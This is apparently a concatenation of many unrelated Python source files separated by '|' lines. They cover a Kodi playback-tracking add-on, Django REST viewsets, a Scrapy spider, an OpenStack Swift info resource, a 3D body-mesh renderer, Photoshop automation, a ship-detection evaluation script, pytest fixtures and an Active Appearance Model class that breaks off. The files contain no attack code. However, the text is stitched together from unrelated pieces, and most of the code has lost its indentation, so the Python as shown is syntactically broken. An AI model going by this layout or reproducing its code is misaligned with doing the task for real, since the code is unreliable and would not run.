self._execute_notify(_app, callback_name, _data)
@staticmethod
def _execute_notify(app, callback_name, data):
try:
method = getattr(app, callback_name)
method(data)
return True
except Exception: # pylint: disable=broad-except
LOG.error('The app {} has raised the following error on {} callback:',
app.DIAL_APP_NAME, callback_name)
import traceback
LOG.error(traceback.format_exc())
return False
@staticmethod
def get_volume():
"""Get the current value of the Kodi volume and mute state"""
return kodi_ops.json_rpc('Application.GetProperties', {'properties': ['volume', 'muted']})
@staticmethod
def set_volume(value):
"""Change the Kodi volume"""
kodi_ops.json_rpc('Application.SetVolume', {'volume': value})
@staticmethod
def set_mute(value):
"""Change the Kodi mute state"""
kodi_ops.json_rpc('Application.SetMute', {'mute': value})
@staticmethod
def show_notification_connected(**kwargs):
kodi_ops.show_notification(kodi_ops.get_local_string(32000).format(**kwargs))
@staticmethod
def show_notification_disconnected(**kwargs):
kodi_ops.show_notification(kodi_ops.get_local_string(32001).format(**kwargs))
@property
def get_ssdp_friendly_name(self):
return G.SP_FRIENDLY_NAME
@property
def get_ssdp_device_uuid(self):
return G.DEVICE_UUID
class Player(xbmc.Player):
def __init__(self, kodi_interface: KodiInterface):
self._kodi_interface = kodi_interface
self._is_tracking_enabled = False
self._started_by_app = False
self._init_count = 0
self._playback_tick = None
super().__init__()
def notify_video_started(self):
"""Notify that a video is started by a call from a DIAL app (see 'play_url' in app.py)"""
self._started_by_app = True
self._is_tracking_enabled = True
def onPlayBackStarted(self):
"""Will be called when Kodi player starts. Video or audio might not be available at this point."""
if not self._is_tracking_enabled:
return
if self._init_count > 0:
            # In this case the user has chosen to play another video while one is
            # already playing, so we send the missing Stop event for the current video
self._on_stop('stopped')
if self._started_by_app:
self._init_count += 1
self._started_by_app = False
def onAVStarted(self):
"""Kodi is actually playing a media file (i.e stream is available)"""
if not self._is_tracking_enabled:
return
        self._kodi_interface._notify_apps('on_playback_started')
if (self._kodi_interface.active_app.CB_TICK_SECS is not None
and (self._playback_tick is None or not self._playback_tick.is_alive())):
self._playback_tick = PlaybackTick(self._kodi_interface._notify_apps,
self._kodi_interface.active_app.CB_TICK_SECS)
            self._playback_tick.daemon = True
self._playback_tick.start()
def onPlayBackPaused(self):
if not self._is_tracking_enabled:
return
self._playback_tick.is_playback_paused = True
self._kodi_interface._notify_apps('on_playback_paused')
def onPlayBackResumed(self):
if not self._is_tracking_enabled:
return
        # Kodi calls this event instead of the "Player.OnStop" event when you try
        # to play a video while another one is already playing
if not self._playback_tick.is_playback_paused:
return
self._kodi_interface._notify_apps('on_playback_resumed')
self._playback_tick.is_playback_paused = False
def onPlayBackSeek(self, time, seek_offset):
if not self._is_tracking_enabled:
return
self._kodi_interface._notify_apps('on_playback_seek', {'time': time, 'seek_offset': seek_offset})
def onPlayBackEnded(self):
"""Will be called when Kodi stops playing a file (at the end)"""
if not self._is_tracking_enabled:
return
self._on_stop('ended')
def onPlayBackStopped(self):
"""Will be called when User stops Kodi playing a file"""
if not self._is_tracking_enabled:
return
self._on_stop('stopped')
def onPlayBackError(self):
"""Will be called when playback stops due to an error"""
if not self._is_tracking_enabled:
return
self._on_stop('error')
def _on_stop(self, state):
if not self._is_tracking_enabled:
return
self._init_count -= 1
        if self._init_count == 0:  # 0 means that no further video started by us will be played
self._is_tracking_enabled = False
if self._playback_tick and self._playback_tick.is_alive():
self._playback_tick.stop_join()
self._playback_tick = None
self._kodi_interface._notify_apps('on_playback_stopped', {'status': state})
@property
def is_in_playing(self):
"""Whether the player is currently playing.
This is different from `self.isPlaying()`
in that it returns `False` if the player is paused or otherwise not actively playing."""
return xbmc.getCondVisibility('Player.Playing')
@property
def is_paused(self):
return xbmc.getCondVisibility("Player.Paused")
@property
def is_tracking_enabled(self):
return self._is_tracking_enabled
class Monitor(xbmc.Monitor):
def __init__(self, kodi_interface: KodiInterface):
self._kodi_interface = kodi_interface
super().__init__()
def onNotification(self, sender, method, data):
if method == 'Application.OnVolumeChanged':
self._kodi_interface._notify_apps('on_volume_changed', json.loads(data))
elif method == 'System.OnQuit':
extra_data_app = (self._kodi_interface.active_app,
{'was_in_playing': self._kodi_interface.player.is_tracking_enabled})
self._kodi_interface._notify_all_apps('on_kodi_close', json.loads(data), extra_data_app)
class PlaybackTick(threading.Thread):
"""Thread to send a notification every (n) secs of playback"""
def __init__(self, notify_apps, timeout_secs):
self._notify_apps = notify_apps
self._timeout_secs = timeout_secs
self._stop_event = threading.Event()
self.is_playback_paused = False
super().__init__()
def run(self):
while not self._stop_event.is_set():
if not self._notify_apps('on_playback_tick', {'is_playback_paused': self.is_playback_paused}):
LOG.warn('PlaybackTick: Interrupted due to an error')
break
if self._stop_event.wait(self._timeout_secs):
break # Stop requested by stop_join
def stop_join(self):
self._stop_event.set()
self.join()
|
from rest_framework import authentication
from task_profile.models import TaskerProfile, CustomerProfile, Notification, InviteCode
from .serializers import (
TaskerProfileSerializer,
CustomerProfileSerializer,
NotificationSerializer,
InviteCodeSerializer,
)
from rest_framework import viewsets
class NotificationViewSet(viewsets.ModelViewSet):
serializer_class = NotificationSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Notification.objects.all()
class InviteCodeViewSet(viewsets.ModelViewSet):
serializer_class = InviteCodeSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = InviteCode.objects.all()
class CustomerProfileViewSet(viewsets.ModelViewSet):
serializer_class = CustomerProfileSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = CustomerProfile.objects.all()
class TaskerProfileViewSet(viewsets.ModelViewSet):
serializer_class = TaskerProfileSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = TaskerProfile.objects.all()
|
import scrapy
from webscraper.scrape import get_content
class EntSpider(scrapy.Spider):
name = "ent"
allowed_domains = ["reddit.com", "twitter.com", "gamepedia.com", "fandom.com"]
start_urls = [
"https://www.reddit.com",
# "https://www.facebook.com",
"https://www.twitter.com",
"https://www.gamepedia.com",
"https://www.fandom.com",
]
def parse(self, response):
if response.status == 200:
content = get_content(response)
yield content
yield from response.follow_all(
content["urls"],
callback = self.parse,
meta = {
"backlink": response.url
}
)
|
#!/usr/local/bin/python3
# I used a couple of different random data generators to
# get some of this data. Including fakenamegenerator.com
# and mockaroo.com
# The URLs supplied by mockaroo.com had a whole ton of
# lorem=ipsum&dingdong=hoohaw&bob=loblaw type args.
# In fact, there were too many for a human (me) to read the URL.
# This dumb script takes those lengthy arguments and
# shortens them up into something eyeball-parseable
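# e.g. (illustrative) a URL such as 'http://x.test/?a=1&b=2&c=3&d=4&e=5&f=6&g=7'
# gets trimmed down to its first few '&'-separated fields (roughly 4 to 7 of
# them, depending on the random argument count chosen below).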
import re
import random
import hashlib
args = random.randrange(2,6)
urls = './wordlists/urls.txt'
with open(urls, 'rt') as url_file:
    url_list = []
    for line in url_file:
        line = line.strip()
        url_list.append(line)
for url in url_list:
start_regexp = "(^http.+?\&.*"
middle_regexp = "?\&.*"
end_regexp = "?[^&]+)"
random_args = middle_regexp * args
regexp = start_regexp + random_args + end_regexp
    shortener_url = re.compile(regexp)
    try:
        matching_url = shortener_url.match(url)
shorter_url = matching_url.group(0)
print(shorter_url)
    except AttributeError:
        # re.match() returned None -- the URL has too few '&' args to shorten
        #print("can't match URL - SORRY")
        continue
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
from openstack import exceptions
from openstack import resource
class Info(resource.Resource):
base_path = "/info"
allow_fetch = True
_query_mapping = resource.QueryParameters(
'swiftinfo_sig', 'swiftinfo_expires'
)
# Properties
swift = resource.Body("swift", type=dict)
slo = resource.Body("slo", type=dict)
staticweb = resource.Body("staticweb", type=dict)
tempurl = resource.Body("tempurl", type=dict)
def fetch(self, session, requires_id=False,
base_path=None, error_message=None):
"""Get a remote resource based on this instance.
:param session: The session to use for making this request.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param boolean requires_id: A boolean indicating whether resource ID
should be part of the requested URI.
:param str base_path: Base part of the URI for fetching resources, if
different from
:data:`~openstack.resource.Resource.base_path`.
:param str error_message: An Error message to be returned if
requested object does not exist.
:return: This :class:`Resource` instance.
:raises: :exc:`~openstack.exceptions.MethodNotSupported` if
:data:`Resource.allow_fetch` is not set to ``True``.
:raises: :exc:`~openstack.exceptions.ResourceNotFound` if
the resource was not found.
"""
if not self.allow_fetch:
raise exceptions.MethodNotSupported(self, "fetch")
# The endpoint in the catalog has version and project-id in it
# To get capabilities, we have to disassemble and reassemble the URL
# This logic is taken from swiftclient
session = self._get_session(session)
endpoint = urllib.parse.urlparse(session.get_endpoint())
url = "{scheme}://{netloc}/info".format(
scheme=endpoint.scheme, netloc=endpoint.netloc)
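        # e.g. a catalog endpoint such as 'https://swift.example.com/v1/AUTH_abc'
        # (hypothetical) is reduced here to 'https://swift.example.com/info'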
microversion = self._get_microversion_for(session, 'fetch')
response = session.get(url, microversion=microversion)
kwargs = {}
if error_message:
kwargs['error_message'] = error_message
self.microversion = microversion
self._translate_response(response, **kwargs)
return self
|
import re
from ClusterSImilarity import FuzzyClusterSimilarity
import pprint
class RoleDictionary:
actor_filenames= ['Phoenix.Countries.actors.txt',
'Phoenix.International.actors.txt',
'Phoenix.MilNonState.actors.txt']
folder = 'data/dictionaries'
actor_set = set()
actor_roles = {}
similarityMeasure = FuzzyClusterSimilarity()
def __init__(self, similarityMeasure=FuzzyClusterSimilarity()):
self.similarityMeasure = similarityMeasure
for filename in self.actor_filenames:
fs = open(self.folder + "/" + filename)
current_roles = set()
current_actors = []
for line in fs:
line = line.strip()
                if line.startswith('#') or len(line.strip()) == 0:  # skip comments and blank lines
continue
line = line.split('#')[0]
words = line.strip().split("\t")
for i in range(0, len(words)):
w = words[i].strip()
if not w.startswith('+') and not w.strip().startswith('['):
#print "NEW ACTOR ", current_actors
for actor in current_actors:
if actor in self.actor_roles:
                                self.actor_roles[actor].update(current_roles)
else:
self.actor_roles[actor] = current_roles
#self.actor_roles[actor] = current_roles
current_actors = []
current_roles = set()
current_actors.append(w.replace('_',' ').strip())
elif w.startswith('+'):
#line.replace()
current_actors.append(w.replace('+','').replace("_"," ").strip())
else:
matched = re.match(r'\[[^\]]*\]',w)
role_with_date = matched.group(0)
current_roles.add(role_with_date[1:len(role_with_date)-1].split(' ')[0])
#print current_roles
fs.close()
#pprint.pprint( self.actor_roles)
def roles(self, actorname):
temp = actorname.replace('_',' ').strip()
# maxKey = None
# maxMatch = 100
# for key in self.actor_roles:
# match = self.similarityMeasure.measure(key, temp)
# if match > maxMatch:
# maxKey = key
# maxMatch = match
return {temp: self.actor_roles.get(temp)}
print('Running')
roleDict = RoleDictionary()
print("initialized")
#roleDict.contains('test')
print(roleDict.roles('BARACK_OBAMA'))
|
import os
import os.path as osp
import cv2
import numpy as np
import json
import trimesh
import argparse
# os.environ["PYOPENGL_PLATFORM"] = "egl"
# os.environ["PYOPENGL_PLATFORM"] = "osmesa"
import pyrender
import PIL.Image as pil_img
import pickle
import smplx
import torch
def main(args):
fitting_dir = args.fitting_dir
recording_name = os.path.abspath(fitting_dir).split("/")[-1]
female_subjects_ids = [162, 3452, 159, 3403]
subject_id = int(recording_name.split('_')[1])
if subject_id in female_subjects_ids:
gender = 'female'
else:
gender = 'male'
pkl_files_dir = osp.join(fitting_dir, 'results')
scene_name = recording_name.split("_")[0]
base_dir = args.base_dir
cam2world_dir = osp.join(base_dir, 'cam2world')
scene_dir = osp.join(base_dir, 'scenes')
recording_dir = osp.join(base_dir, 'recordings', recording_name)
color_dir = os.path.join(recording_dir, 'Color')
meshes_dir = os.path.join(fitting_dir, 'meshes')
rendering_dir = os.path.join(fitting_dir, 'images')
body_model = smplx.create(args.model_folder, model_type='smplx',
gender=gender, ext='npz',
num_pca_comps=args.num_pca_comps,
create_global_orient=True,
create_body_pose=True,
create_betas=True,
create_left_hand_pose=True,
create_right_hand_pose=True,
create_expression=True,
create_jaw_pose=True,
create_leye_pose=True,
create_reye_pose=True,
create_transl=True
)
if args.rendering_mode == '3d' or args.rendering_mode == 'both':
static_scene = trimesh.load(osp.join(scene_dir, scene_name + '.ply'))
with open(os.path.join(cam2world_dir,scene_name + '.json'), 'r') as f:
trans = np.array(json.load(f))
trans = np.linalg.inv(trans)
static_scene.apply_transform(trans)
body_scene_rendering_dir = os.path.join(fitting_dir, 'renderings')
if not osp.exists(body_scene_rendering_dir):
os.mkdir(body_scene_rendering_dir)
if args.rendering_mode == 'body' or args.rendering_mode == 'both':
if not osp.exists(rendering_dir):
os.mkdir(rendering_dir)
#common
H, W = 1080, 1920
camera_center = np.array([951.30, 536.77])
camera_pose = np.eye(4)
camera_pose = np.array([1.0, -1.0, -1.0, 1.0]).reshape(-1, 1) * camera_pose
camera = pyrender.camera.IntrinsicsCamera(
fx=1060.53, fy=1060.38,
cx=camera_center[0], cy=camera_center[1])
light = pyrender.DirectionalLight(color=np.ones(3), intensity=4.0)
if args.body_color == 'pink':
base_color = (1.0, 193/255, 193/255, 1.0)
elif args.body_color == 'white':
base_color = (0.7, 0.7, 0.7, 1.0)
# base_color = (1.0, 1.0, 0.9, 1.0)
material = pyrender.MetallicRoughnessMaterial(
metallicFactor=0.0,
alphaMode='OPAQUE',
# baseColorFactor=(1.0, 193/255, 193/255, 1.0)
baseColorFactor=base_color
)
for img_name in sorted(os.listdir(pkl_files_dir))[args.start::args.step]:
print('viz frame {}'.format(img_name))
with open(osp.join(pkl_files_dir, img_name, '000.pkl'), 'rb') as f:
param = pickle.load(f)
torch_param = {}
for key in param.keys():
if key in ['pose_embedding', 'camera_rotation', 'camera_translation']:
continue
else:
torch_param[key] = torch.tensor(param[key])
output = body_model(return_verts=True, **torch_param)
vertices = output.vertices.detach().cpu().numpy().squeeze()
body = trimesh.Trimesh(vertices, body_model.faces, process=False)
if args.save_meshes:
body.export(osp.join(meshes_dir,img_name, '000.ply'))
body_mesh = pyrender.Mesh.from_trimesh(body, material=material)
if args.rendering_mode == 'body' or args.rendering_mode == 'both':
img = cv2.imread(os.path.join(color_dir, img_name + '.jpg'))[:, :, ::-1] / 255.0
H, W, _ = img.shape
img = cv2.flip(img, 1)
scene = pyrender.Scene(bg_color=[0.0, 0.0, 0.0, 0.0],
ambient_light=(0.3, 0.3, 0.3))
scene.add(camera, pose=camera_pose)
scene.add(light, pose=camera_pose)
scene.add(body_mesh, 'mesh')
r = pyrender.OffscreenRenderer(viewport_width=W,
viewport_height=H,
point_size=1.0)
color, _ = r.render(scene, flags=pyrender.RenderFlags.RGBA)
color = color.astype(np.float32) / 255.0
valid_mask = (color[:, :, -1] > 0)[:, :, np.newaxis]
input_img = img
output_img = (color[:, :, :-1] * valid_mask +
(1 - valid_mask) * input_img)
img = pil_img.fromarray((output_img * 255).astype(np.uint8))
img.save(os.path.join(rendering_dir, img_name + '_output.png'))
if args.rendering_mode == '3d' or args.rendering_mode == 'both':
static_scene_mesh = pyrender.Mesh.from_trimesh(static_scene)
scene = pyrender.Scene()
scene.add(camera, pose=camera_pose)
scene.add(light, pose=camera_pose)
scene.add(static_scene_mesh, 'mesh')
body_mesh = pyrender.Mesh.from_trimesh(
body, material=material)
scene.add(body_mesh, 'mesh')
r = pyrender.OffscreenRenderer(viewport_width=W,
viewport_height=H)
color, _ = r.render(scene)
color = color.astype(np.float32) / 255.0
img = pil_img.fromarray((color * 255).astype(np.uint8))
img.save(os.path.join(body_scene_rendering_dir, img_name + '.png'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--fitting_dir', type=str, default='/local/home/szhang/temp_prox/fit_results_15217_adam_other_slide/PROXD/N3OpenArea_00157_01')
parser.add_argument('--body_color', type=str, default='pink', choices=['pink', 'white'])
parser.add_argument('--base_dir', type=str, default='/mnt/hdd/PROX', help='recording dir')
parser.add_argument('--start', type=int, default=0, help='id of the starting frame')
    parser.add_argument('--step', type=int, default=1, help='step (stride) between processed frames')
    parser.add_argument('--model_folder', default='/mnt/hdd/PROX/body_models/smplx_model', type=str, help='path to the SMPL-X body model folder')
    parser.add_argument('--num_pca_comps', type=int, default=12, help='number of hand pose PCA components for the SMPL-X model')
parser.add_argument('--save_meshes', default=False, type=lambda x: x.lower() in ['true', '1'])
parser.add_argument('--rendering_mode', default='3d', type=str,
choices=['body', '3d', 'both'],
                        help='render only the body, render the body in the 3D scene, or both')
args = parser.parse_args()
main(args)
|
import logging
from urllib.parse import urljoin
import requests
import requests_cache
from requests.auth import HTTPBasicAuth
from army_ant.reader import Document, Entity, Reader
logger = logging.getLogger(__name__)
class LivingLabsReader(Reader):
def __init__(self, source_path, limit=None):
super(LivingLabsReader, self).__init__(source_path)
self.limit = limit
base_url, api_key = source_path.split('::')
self.base_url = urljoin(base_url, "/api/v2/participant/")
self.api_key = api_key
self.headers = {'Content-Type': 'application/json'}
self.auth = HTTPBasicAuth(api_key, '')
requests_cache.install_cache('living_labs_cache', expire_after=10800)
self.docs = self.get_docs()
self.idx = 0
if self.limit:
self.docs = self.docs[0:self.limit]
def get_docs(self):
logging.info("Retrieving Living Labs documents")
r = requests.get(urljoin(self.base_url, 'docs'), headers=self.headers, auth=self.auth)
if r.status_code != requests.codes.ok:
r.raise_for_status()
return r.json()['docs']
def format_author_name(self, name):
if name:
parts = name.split(',', 1)
if len(parts) == 2:
return '%s %s' % (parts[1].strip(), parts[0].strip())
return name
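    # e.g. format_author_name('Doe, John') above returns 'John Doe'; a value
    # without a comma (or an empty value) is returned unchanged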
def to_text(self, doc, fields=['title'], content_fields=['abstract']):
text = [doc[field] for field in fields]
text.extend([doc['content'][field] for field in content_fields])
return '\n'.join(filter(lambda d: d is not None, text))
def to_triples(self, doc,
content_fields=['author', 'language', 'issued', 'publisher', 'type', 'subject', 'description']):
triples = []
for field in content_fields:
if field in doc['content'] and doc['content'][field]:
if field == 'author':
doc['content'][field] = self.format_author_name(doc['content'][field])
triples.append((Entity(doc['docid']), Entity(field), Entity(doc['content'][field])))
return triples
def __next__(self):
if self.idx >= len(self.docs):
raise StopIteration
else:
doc = self.docs[self.idx]
self.idx += 1
return Document(
doc_id=doc['docid'],
text=self.to_text(doc),
triples=self.to_triples(doc))
|
#!/usr/bin/env python
# SPDX-FileCopyrightText: 2022 Espressif Systems (Shanghai) CO LTD
#
# SPDX-License-Identifier: Apache-2.0
# This script is used from the $IDF_PATH/install.* scripts. This way the argument parsing can be done at one place and
# doesn't have to be implemented for all shells.
import argparse
from itertools import chain
try:
import python_version_checker
    # check the Python version early, before the script fails with an exception due to a syntax or package incompatibility
python_version_checker.check()
except RuntimeError as e:
print(e)
raise SystemExit(1)
def action_extract_features(args: str) -> None:
"""
Command line arguments starting with "--enable-" are features. This function selects those and prints them.
"""
features = ['core'] # "core" features should be always installed
if args:
arg_prefix = '--enable-'
features += [arg[len(arg_prefix):] for arg in args.split() if arg.startswith(arg_prefix)]
print(','.join(features))
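# Illustrative call (the argument string is of the kind the install.* scripts forward here):
#   action_extract_features('--enable-ci --enable-pytest esp32')
# prints "core,ci,pytest" -- 'core' is always included.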
def action_extract_targets(args: str) -> None:
"""
Command line arguments starting with "esp" are chip targets. This function selects those and prints them.
"""
target_sep = ','
targets = []
if args:
target_args = (arg for arg in args.split() if arg.lower().startswith('esp'))
# target_args can be comma-separated lists of chip targets
targets = list(chain.from_iterable(commalist.split(target_sep) for commalist in target_args))
print(target_sep.join(targets or ['all']))
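# Illustrative call:
#   action_extract_targets('--enable-ci esp32,esp32s2')
# prints "esp32,esp32s2"; when no chip targets are given it prints "all".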
def main() -> None:
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest='action', required=True)
extract = subparsers.add_parser('extract', help='Process arguments and extract part of it')
extract.add_argument('type', choices=['targets', 'features'])
extract.add_argument('str-to-parse', nargs='?')
args, unknown_args = parser.parse_known_args()
# standalone "--enable-" won't be included into str-to-parse
action_func = globals()['action_{}_{}'.format(args.action, args.type)]
str_to_parse = vars(args)['str-to-parse'] or ''
action_func(' '.join(chain([str_to_parse], unknown_args)))
if __name__ == '__main__':
main()
|
import win32com.client
import os
#from pathvalidate import sanitize_filename
class AutomatePh:
app = None
psd_file = None
def __init__(self):
self.app = win32com.client.Dispatch("Photoshop.Application")
self.app.Visible = False
def closePhotoshop(self):
self.app.Quit()
def openPSD(self, filename):
        if not os.path.isfile(filename):
self.closePhotoshop()
return False
self.app.Open(filename)
self.psd_file = self.app.Application.ActiveDocument
return True
def closePSD(self):
if self.psd_file is None:
            raise Exception("No PSD file is currently open")
self.app.Application.ActiveDocument.Close(2)
def updateLayer(self, Layer_name, text):
if self.psd_file is None:
            raise Exception("No PSD file is currently open")
layer = self.psd_file.ArtLayers[Layer_name]
layer_text = layer.TextItem
layer_text.contents = text
return True
def exportJPEG(self, filename, folder='', quality=10):
if self.psd_file is None:
            raise Exception("No PSD file is currently open")
full_path = os.path.join(folder, filename)
options = win32com.client.Dispatch("Photoshop.ExportOptionsSaveForWeb")
options.Format = 6
options.Quality = quality
self.psd_file.Export(ExportIn=full_path, ExportAs=2, Options=options)
return os.path.isfile(full_path)
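# Minimal usage sketch (the file paths, layer name and quality below are made up):
#   ph = AutomatePh()
#   if ph.openPSD(r'C:\work\template.psd'):
#       ph.updateLayer('TitleText', 'Hello world')
#       ph.exportJPEG('card_001.jpg', folder=r'C:\work\out', quality=8)
#       ph.closePSD()
#   ph.closePhotoshop()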
|
import collections
import contextlib
import curses
from typing import Dict
from typing import Generator
from babi.buf import Buf
from babi.hl.interface import HL
from babi.hl.interface import HLs
class Replace:
include_edge = True
def __init__(self) -> None:
self.regions: Dict[int, HLs] = collections.defaultdict(tuple)
def highlight_until(self, lines: Buf, idx: int) -> None:
"""our highlight regions are populated in other ways"""
def register_callbacks(self, buf: Buf) -> None:
"""our highlight regions are populated in other ways"""
@contextlib.contextmanager
def region(self, y: int, x: int, end: int) -> Generator[None, None, None]:
# XXX: this assumes pair 1 is the background
attr = curses.A_REVERSE | curses.A_DIM | curses.color_pair(1)
self.regions[y] = (HL(x=x, end=end, attr=attr),)
try:
yield
finally:
del self.regions[y]
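# Minimal usage sketch (hypothetical caller): while the `with` body runs, columns
# x..end of line y are drawn reverse/dim, and the temporary region is removed
# again on exit:
#   hl = Replace()
#   with hl.region(y=3, x=0, end=5):
#       ...  # redraw the screen here; hl.regions[3] holds the temporary HL tuple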
|
import argparse
from datetime import date
import os
import sys
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
os.environ['CUDA_VISIBLE_DEVICES']='6'
# import keras
# import keras.preprocessing.image
# import keras.backend as K
# from keras.optimizers import Adam, SGD
from tensorflow import keras
import tensorflow.keras.backend as K
from tensorflow.keras.optimizers import Adam, SGD
from augmentor.color import VisualEffect
from augmentor.misc import MiscEffect
from model import efficientdet
from losses import smooth_l1, focal, smooth_l1_quad
from efficientnet import BASE_WEIGHTS_PATH, WEIGHTS_HASHES
from utils.anchors import AnchorParameters
from generators.ship import ShipGenerator
from eval.common import evaluate
import numpy as np
AnchorParameters.ship = AnchorParameters(
sizes=[32, 64, 128, 256, 512],
strides=[8, 16, 32, 64, 128],
ratios=np.array([0.25,0.5,2,4], keras.backend.floatx()),
scales=np.array([0.25, 0.5, 0.75, 1.0 , 1.25], keras.backend.floatx()),
)
def main():
phi = 1
weighted_bifpn = False
image_sizes = (512, 640, 768, 896, 1024, 1280, 1408)
image_size = image_sizes[phi]
score_threshold = 0.9
nms_threshold = 0.5
common_args = {
'batch_size': 1,
'phi': phi,
'detect_ship': True,
'detect_quadrangle': True,
}
#ship_path = '/home/minjun/Jupyter/Ship_Detection/Data/train_tfrecorder/train_data2.tfrecords'
val_dir = '/home/minjun/Jupyter/Ship_Detection/Data/tfrecorder/val_data_1280.tfrecords'
model_path = 'checkpoints/test4/ship_95_0.2889_0.3075.h5'
print(model_path)
# train_generator = ShipGenerator(
# 'train/ship_detection',
# ship_path,
# gen_type='train',
# ratio = ratio,
# group_method='none',
# **common_args
# )
validation_generator = ShipGenerator(
'val/ship_detection',
val_dir,
gen_type='val',
ratio = 1,
shuffle_groups=False,
selection=False,
**common_args
)
num_classes = validation_generator.num_classes()
num_anchors = validation_generator.num_anchors
anchor_parameters=AnchorParameters.ship
model, prediction_model = efficientdet(phi,
num_classes=num_classes,
num_anchors=num_anchors,
freeze_bn=True,
detect_quadrangle=True,
anchor_parameters=anchor_parameters,
score_threshold=score_threshold,
nms_threshold=0.3
)
prediction_model.load_weights(model_path, by_name=True)
# print(evaluate(generator=train_generator,
# model = prediction_model,
# score_threshold=0.01,
# max_detections=100,
# visualize=False,
# )
# )
if False:
for i in np.arange(0.2, 1, 0.05):
print(evaluate(generator=validation_generator,
model = prediction_model,
score_threshold=score_threshold,
max_detections=300,
visualize=False,
nms_threshold=i,
)
)
print(evaluate(generator=validation_generator,
model = prediction_model,
score_threshold=score_threshold,
max_detections=300,
visualize=True,
nms_threshold=nms_threshold,
)
)
#colors = [np.random.randint(0, 256, 3).tolist() for _ in range(num_classes)]
# score_threshold = 0.01
#num_fp=2439.0, num_tp=14580.0
#{0: (0.859279664856701, 4106.0), 1: (0.8278047641932937, 1579.0), 2: (0.40426303380023887, 57.0), 3: (0.8525899236151595, 10989.0)}
#num_fp=2439.0, num_tp=14580.0
#{0: (0.859279664856701, 4106.0), 1: (0.8278047641932937, 1579.0), 2: (0.40426303380023887, 57.0), 3: (0.8525899236151595, 10989.0)}
#num_fp=1186.0, num_tp=20099.0 , selection
# {0: (0.8863557966508845, 2413.0), 1: (0.8712331102638979, 1579.0), 2: (1.0, 3.0), 3: (0.8585311515528976, 19048.0)}
if __name__ == '__main__':
main()
|
#!/bin/python3
import sys
from itertools import combinations
def pythagoreanTriple(a):
if a%2==0:
b = (a//2)**2 -1
c = b+2
else:
b = (a**2-1)//2
c = b + 1
return [a,b,c]
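    # Worked check (added for clarity, valid for a >= 3): for even a,
    # b = (a/2)**2 - 1 and c = (a/2)**2 + 1, so c**2 - b**2 = (c-b)*(c+b) = a**2.
    # For odd a, b = (a**2-1)/2 and c = (a**2+1)/2, so c**2 - b**2 = a**2 as well.
    # e.g. pythagoreanTriple(3) -> [3, 4, 5], pythagoreanTriple(8) -> [8, 15, 17]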
# if a%2==0:#even
# mn = a//2
# l = list(range(1,10))
# for i in combinations(l, 2):
# m, n = i[0], i[1]
# if m*n == mn:
# break
# b = abs(m**2 - n**2)
# c = m**2 + n**2
# return [a, b, c]
# else:
# l = list(range(1,10))
# for i in combinations(l, 2):
# m, n = i[0], i[1]
# print(m,n)
# if abs(m**2 - n**2) == a:
# break
# b = 2*m*n
# c = m**2 + n**2
# # k = ((a**2) - 1) // 2
# # b = k
# # c = k+1
# return [a,b,c]
a = int(input().strip())
triple = pythagoreanTriple(a)
print (" ".join(map(str, triple)))
|
import pytest
from kpm.manifest_jsonnet import ManifestJsonnet
@pytest.fixture()
def manifest(kubeui_package, package_dir):
return ManifestJsonnet(kubeui_package)
@pytest.fixture()
def empty_manifest(empty_package_dir):
return ManifestJsonnet(package=None)
@pytest.fixture()
def bad_manifest():
return ManifestJsonnet(package=None)
def test_empty_resources(empty_manifest):
assert empty_manifest.resources == []
def test_empty_variables(empty_manifest):
assert empty_manifest.variables == {'namespace': 'default'}
def test_empty_package(empty_manifest):
assert empty_manifest.package == {'expander': "jinja2"}
def test_empty_shards(empty_manifest):
assert empty_manifest.shards is None
def test_empty_deploy(empty_manifest):
assert empty_manifest.deploy == []
def test_package_name(manifest):
assert manifest.package_name() == "kube-system_kube-ui_1.0.1"
def test_kubename(manifest):
assert manifest.kubname() == "kube-system_kube-ui"
def test_load_from_path(manifest):
m = ManifestJsonnet()
assert m == manifest
def test_load_bad_manifest(bad_package_dir):
import yaml
with pytest.raises(yaml.YAMLError):
ManifestJsonnet(package=None)
|
from __future__ import division
import numpy as np
from menpo.shape import TriMesh
from menpofit.base import DeformableModel, name_of_callable
from .builder import build_patch_reference_frame, build_reference_frame
class AAM(DeformableModel):
r"""
Active Appearance Model class.
Parameters
-----------
shape_models : :map:`PCAModel` list
A list containing the shape models of the AAM.
appearance_models : :map:`PCAModel` list
A list containing the appearance models of the AAM.
n_training_images : `int`
The number of training images used to build the AAM.
transform : :map:`PureAlignmentTransform`
The transform used to warp the images from which the AAM was
constructed.
features : `callable` or ``[callable]``, optional
If list of length ``n_levels``, feature extraction is performed at
each level after downscaling of the image.
The first element of the list specifies the features to be extracted at
the lowest pyramidal level and so on.
If ``callable`` the specified feature will be applied to the original
image and pyramid generation will be performed on top of the feature
image. Also see the `pyramid_on_features` property.
Note that from our experience, this approach of extracting features
once and then creating a pyramid on top tends to lead to better
performing AAMs.
reference_shape : :map:`PointCloud`
The reference shape that was used to resize all training images to a
consistent object size.
downscale : `float`
The downscale factor that was used to create the different pyramidal
levels.
scaled_shape_models : `boolean`, optional
If ``True``, the reference frames are the mean shapes of each pyramid
level, so the shape models are scaled.
If ``False``, the reference frames of all levels are the mean shape of
the highest level, so the shape models are not scaled; they have the
same size.
Note that from our experience, if scaled_shape_models is ``False``, AAMs
tend to have slightly better performance.
"""
def __init__(self, shape_models, appearance_models, n_training_images,
transform, features, reference_shape, downscale,
scaled_shape_models):
DeformableModel.__init__(self, features)
self.n_training_images = n_training_images
self.shape_models = shape_models
self.appearance_models = appearance_models
self.transform = transform
self.reference_shape = reference_shape
self.downscale = downscale
self.scaled_shape_models = scaled_shape_models
@property
def n_levels(self):
